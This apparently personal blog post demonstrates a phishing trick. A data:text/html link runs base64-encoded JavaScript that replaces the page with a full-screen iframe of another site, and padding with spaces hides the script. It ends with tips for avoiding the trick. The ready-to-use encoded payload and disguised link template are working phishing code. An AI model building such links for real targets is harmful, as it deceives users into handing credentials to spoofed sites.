Sneaky phishing method in modern browsers

Chrome, Firefox and most other modern browsers allow you to execute base64 encoded data via data:text/html. For example we could prepend „data:text/html,“ to a trustworthy URL like „“ and instead of loading the displayed url we execute a bunch of other stuff encoded in our following script tag (yeah I know a programmer would not fall for it, but your parents will!)

data:text/html, <script src=data:text/html;base64,{BASE64 ENCODED JS}></script>

{BASE64 ENCODED JS} can be replaced with any js. With some lines of code we can load anything we want and make the user believe he is browsing on

window.document.title = "Some test title";
window.document.body.outerHTML = "<iframe src=\"\" style=\"border: 0;width: 100%;height:100%\"></iframe>"; = "0"; = "0";

The whole code base64 encoded:



data:text/html, <script src=data:text/html;base64,d2luZG93LmRvY3VtZW50LnRpdGxlID0gIlNvbWUgdGVzdCB0aXRsZSI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5vdXRlckhUTUwgPSAiPGlmcmFtZSBzcmM9XCJodHRwOi8vZXhhbXBsZS5jb21cIiBzdHlsZT1cImJvcmRlcjogMDt3aWR0aDogMTAwJTtoZWlnaHQ6MTAwJVwiPjwvaWZyYW1lPiI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5zdHlsZS5wYWRkaW5nID0gIjAiOw0Kd2luZG93LmRvY3VtZW50LmJvZHkuc3R5bGUubWFyZ2luID0gIjAiOw==></script>

Add some spaces to the url and build a simple link so it doesn’t look suspicious and here we go:

<a href="data:text/html,                                                                                                                                                                                                                                                                        <script src=data:text/html;base64,d2luZG93LmRvY3VtZW50LnRpdGxlID0gIlNvbWUgdGVzdCB0aXRsZSI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5vdXRlckhUTUwgPSAiPGlmcmFtZSBzcmM9XCJodHRwOi8vZXhhbXBsZS5jb21cIiBzdHlsZT1cImJvcmRlcjogMDt3aWR0aDogMTAwJTtoZWlnaHQ6MTAwJVwiPjwvaWZyYW1lPiI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5zdHlsZS5wYWRkaW5nID0gIjAiOw0Kd2luZG93LmRvY3VtZW50LmJvZHkuc3R5bGUubWFyZ2luID0gIjAiOw==></script>">Click here to load in an iframe via js</a>


Removed some spaces from the snippet.
So many spaces, that the script isn’t even visible.







How can I prevent getting phished like this?

  1. Use password managers that preserve your login urls (keepass, 1password, etc.).
  2. Don’t click on stuff in E-Mails ;D
  3. Check the certificate in your browser.
  4. Never login on any site after you opened it out of an email.

More about this topic:

  1. Gist by timruffles
  2. @tomscott

© Copyright | Impressum | Datenschutzerklärung